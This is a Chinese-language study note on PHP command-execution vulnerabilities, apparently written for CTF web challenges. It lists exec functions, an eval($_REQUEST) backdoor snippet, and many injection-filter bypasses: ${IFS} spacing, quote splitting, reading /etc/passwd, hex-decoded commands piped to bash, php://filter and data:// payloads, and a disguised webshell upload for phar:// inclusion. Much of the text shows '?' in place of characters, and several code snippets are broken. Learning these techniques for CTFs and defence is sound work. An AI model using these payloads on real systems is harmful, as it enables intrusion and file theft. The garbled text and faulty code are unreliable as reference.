[PHP知识库]Web1 命令执行（二）

三.常见的系统执行函数

system，shell_exec，exec，popen，passthru

1.system

将 字符串 作为 OS命令 去执?，并且 自带输出功能。

system(string $command, int &$return_var = ?): string

利用方式：
 <?php
//a = system('ls')
$a = $_REQUEST[a];
eval($a);
?>

2.?shell_exec()

通过 shell 环境执?命令，并且将完整的输出以字符串的?式返回。

只返回字符串，不会进?输出

该函数和 反引号 `` 的执?效果?致

shell_exec(string $cmd): string

利用方式：
<?php
$output = shell_exec('ls -lart');
echo "<pre>$output</pre>"; //需要输出显示结果
//print($output);
?>

3.?exec

将 字符串 作为 OS命令 去执?，但是?身 不带输出功能，需要写? 输出功能的代码

执??个外部程序

exec(string $command, array &$output = ?, int &$return_var = ?): string

本函数执?输? command 的外部程序或外部指令。它的返回字符串只是外部程序执?后返回的最后一行；若需要完整的返回字符串，可以使? PassThru() 这个函数。

利用方式：
<?php
echo exec("whoami");
?>
注意：该函数能够执行系统命令，但是返回结果是有限度的(即返回不全)
# 例如：exec('ping 127.0.0.1'); 可执行，显示不出来
# print(exec('ping 127.0.0.1')); 可显示出来但，显示不完全

?4.popen

打开进程?件指针

popen(string $command , string $mode ): resource

打开?个指向进程的管道，该进程由派?给定的 command 命令执??产?。

利用方式:
<?php
$handle = popen("/bin/ls", "r");
?>

5.passthru

执?外部程序并且 自带输出功能。

passthru(string $command , int &$return_var = ?): void

同 exec() 函数类似， passthru() 函数 也是?来执?外部命令（ command ）的。 当 所执?的 Unix 命令输出?进制数据， 并且需要直接传送到浏览器的时候， 需要用此函数来替代 exec() 或 system() 函数。 常?来执?诸如 pbmplus 之类的可以直接输出图像流的命令。 通过设置 Content-type 为 image/gif ， 然后调? pbmplus 程序输出 gif ?件， 就可以从 PHP 脚本中直接输出图像到浏览器。

利用方式：
<?php
passthru ('echo $PATH');
?>

四.其他命令执行函数

1.PHP：exec、shell_exec、system、passthru、popen、proc_open等 ?

2.ASP.NET：System.Diagnostics.Start.Process、System.Diagnostics.Start.Proces sStartInfo等

3.Java：java.lang.runtime.Runtime.getRuntime、java.lang.runtime.Runtime.exec 等

五.积累

1.PHP中不需要括号的函数

（1）echo 111;

（2）print 123;

（3）die;

（4）include " "

（5）require " "?

（6）include_once " "?

（7）require_once " "

2.系统命令

（1）可以用? 匹配字符

（2）可以用;间隔两条命令

（3）$? //上一次命令执行成功为0，不成功为1

（4）env 查看本地变量

（5）``和$()可以代替shell_exec执行系统命令 //web396

（6）nl * 打开目录下所有文件

3.PHP：<?= ?>===<?php ?>

六.正则（安全的一道防线）

正则详细教程

七.常见的绕过姿势

1.常用符号

（1）命令连接符

Windows和Linux都?持的命令连接符:|? ?||? ?&? ?&&

cmd1 | cmd2 只执行cmd2

cmd1 || cmd2 只有当cmd1执行失败后，cmd2才被执行

cmd1 & cmd2 先执行cmd1，不管是否成功，都会执行cmd2

cmd1 && cmd2 先执行cmd1，只有cmd1执行成功后才执行cmd2，否则不执行cmd2

Linux特有： 分号（；）

cmd1 ; cmd2 按顺序依次执行，先执行cmd1再执行cmd

（2）通配符

• ??? ? ? ?#单个字符，匹配字符会受到限制
• *? ? ? ? #零个、单个或多个字符，表示匹配的数量不受限制

例：遇到system($_GET['c']);,则c可以传参

/???/?s --help

#可代表/bin/ls --help


/???/????64 f???.???

#可代表/bin/base64 flag.php:base64编码flag.php的内容。


/???/?[a][t] ?''?''?''?''

#可代表/usr/bin/bzip2 flag.php:将flag.php文件进行压缩，然后再将其下载。


/???/?at ????

/???/?[a]''[t] ?''?''?''?''

#可代表/bin/cat: test:

2.cat绕过

(1)more:一页一页的显示档案内容

(2)less:与 more 类似，但是比 more 更好的是，他可以[pg dn][pg up]翻页

(3)head:查看头几行

(4)tac:从最后一行开始显示，可以看出 tac 是 cat 的反向显示

(5)tail:查看尾几行

(6)nl：显示的时候，顺便输出行号

(7)od:以二进制的方式读取档案内容

(8)vi:一种编辑器，这个也可以查看

(9)vim:一种编辑器，这个也可以查看

(10)sort:可以查看

(11)uniq:可以查看

(12)file -f:报错出具体内容

(13)sed:一种编辑器，这个也可以查看

(14)grep 1、在当前目录中，查找后缀有 file 字样的文件中包含 test 字符串的文件，并打印出该字符 串的行。此时，可以使用如下命令： grep test *file

(15)strings

3.空格绕过

（1）${IFS}替换

cat${IFS}flag.txtcat$IFS$1flag.txtcat${IFS}$1flag.txt

（2）$IFS$1替换

（3）${IFS替换 ${IFS}$9

${IFS},$IFS,$IFS$9的区别，首先$IFS在linux下表示分隔符，只有cat$IFSa.txt的时候,bash解释器会把整个IFSa当做变量名，所以导致没有办法运行，然而如果加一个{}就固定了变量名，同理在后面加个$可以起到截断的作用，而$9指的是当前系统shell进程的第九个参数的持有者，就是一个空字符串，因此$9相当于没有加东西，等于做了一个前后隔离。

（4）%20替换

（5）< 和 <> 重定向符替换

cat<>flag.txtcat

（6）%09替换(需要php环境)

cat%09flag.txt

（7）%0a %0b %0c %0d

4. 敏感字符绕过

（1）变量绕过

1. a=c;b=at;c=fl;d=ag;$a$b $c$d

2.a=c;b=at;c=heb;d=ic;ab{c}{d}

a = eval($_GET[1]);&1=.....

(2)base64绕过

echo 1234 | base64

输出:MTIzNAo=


echo 'MTIzNAo=' | base64 -d

输出：1234


/bin/base64 1.txt

输出：MTIzCg==

（3）单双引号

• ca' 't?flag?或ca" "t?flag
• ca' 't?te" "st.php

（4）反斜线

c\at? fl\ag

（5）连接符

cat /etc/pass'w'd

（6）hex编码

echo?"636174202f666c6167"?|?xxd?-r?-p|bash?==>cat?/flag

（7）绕过ip中的句点

网络地址可以转换成数字地址，比如127.0.0.1可以转化为2130706433。
可以直接访问http://2130706433或者http://0x7F000001，这样就可以绕过.的ip过滤。
在线转换地址：数字转IP地址?IP地址转数字?域名转数字IP

数字转ip地址 ip地址转数字 域名转数字ip

5.php include + 伪协议 绕过

1. ?c=include $_GET["a"] ?>&a=php://filter/read=convert.base64-encode/reso
urce=flag.php

2. ?c=include $_POST[1] ?>&1=php://filter/read=convert.base64-encode/resou
rce=flag.php

1. ?c=data://text/plain,<?php echo system('cat fl*');?>
2. ?c=data://text/plain,<?php%20system('tac fl*');?>
3. ?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg=
=

其中PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==的解码为<?php echo system
('cat fl*');?>

伪协议:https://blog.csdn.net/weixin_44604541/article/details/110149949
php伪协议主要有以下：

• file://：用于访问本地文件系统读取本地文件
• php://：访问各个输入/输出流（I/O streams），其中php://filter用于读取文件内容，php://input可以访问请求的原始数据的只读流、同时可将post请求中的数据作为PHP代码执行
• zip://，bzip2://，zlib://：均属于压缩流，可以访问压缩文件中的子文件，更重要的是不需要指定后缀名
• data://：写入数据
• phar://：PHP归档

通常都会用在文件包含上

1、php:// 输入输出流
PHP 提供了一些杂项输入/输出（IO）流，允许访问 PHP 的输入输出流、标准输入输出和错误描述符， 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。

（1）php://filter

• 元封装器，设计用于”数据流打开”时的”筛选过滤”应用
• 本地磁盘文件进行读取
• 不需要开启allow_url_fopen和allow_url_include

有一些敏感信息会保存在php文件中，如果我们直接利用文件包含去打开一个php文件，php代码是不会显示在页面上的，这时候我们可以以base64编码的方式读取指定文件的源码。

用法

?filename=php://filter/convert.base64-encode/resource=xxx.php
?filename=php://filter/read=convert.base64-encode/resource=xxx.php?

（2）php://input

• 可以访问请求的原始数据的只读流
• 即可以直接读取到POST上没有经过解析的原始数据
• 不需要开启allow_url_fopen和allow_url_include
• 在遇到file_get_contents()时可以用php://input绕过

<?php
? ? echo file_get_contents("php://input");
?>

可以用来执行命令，也可以写入木马

2、file:// 读取文件内容
通过file协议可以访问本地文件系统，读取到文件的内容
且不受allow_url_fopen与allow_url_include的影响
只能输入绝对路径，输入相对路径不生效

注：输入php或JS文件，file://协议会执行该PHP文件里的代码而不是显示该内容

3、data:// 读取文件
数据流封装器，和php://相似都是利用了流的概念
将原本的include的文件流重定向到了用户可控制的输入流中
简单来说就是执行文件的包含方法包含了你的输入流

条件：

• php版本大于等于php5.2
• 必须同时开启allow_url_fopen和allow_url_include

使用方法

data:text/plain;base64, <script>alert('xss')</script>
data://text/plain;base64, <script>alert('xss')</script>
data:text/plain;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=
data://text/plain;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=

执行命令

?file=data:text/plain,<?php phpinfo();?>

base64绕过

index.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

4、phar:// 针对压缩包
php解压缩包的一个函数
不管后缀是什么，都会当做压缩包来解压

条件

• 压缩包需要zip协议压缩
• php版本大于等于php5.3.0

用法

• 一句话木马文件shell.php
• 用zip协议压缩为shell.zip
• 将后缀改为png等其他格式
• 上传
• 访问

5、zip:// 针对压缩包
类似phar://
使用方法和条件有点区别

条件:

• 压缩包需要zip协议压缩
• php版本大于等于php5.3.0，windows下php还得小于5.4
• 不需要开启allow_url_fopen和allow_url_include
• #编码为%23，接上压缩包内的文件
• 需要指定绝对路径

注
类似的还有zlib://协议和bzip2://协议

————————————————
版权声明：本文为CSDN博主「思源湖的鱼」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/weixin_44604541/article/details/110149949

6.扫描目录

（1）print_r扫描?录

c=print_r(scandir('.'));#查看当前目录
c=print_r(scandir('/'));#查看根目录
c=print_r(glob('*'));#查看当前目录
c=print_r(glob('/*'));#查看根目录

（2）var_dump扫描?录

c=var_dump(scandir('.'));#查看当前目录
c=var_dump(scandir('/'));#查看根目录
c=var_dump(glob('*'));#查看当前目录
c=var_dump(glob('/*'));#查看根目录

（3）var_export扫描?录

c=var_export(scandir('.'));#查看当前目录
c=var_export(scandir('/'));#查看根目录
c=var_export(glob('*'));#查看当前目录
c=var_exportdump(glob('/*'));#查看根目录

（4）glob?录遍历

c=
$a=new DirectoryIterator("glob:///*");
foreach($a as $f){
echo $f." " ;
}
exit();
或者
$a = "glob:///*.txt";
if($b=opendir($a)){
while(($file=readdir($b))!==false){
echo "filename:".$b."\n";

}
close($b);
}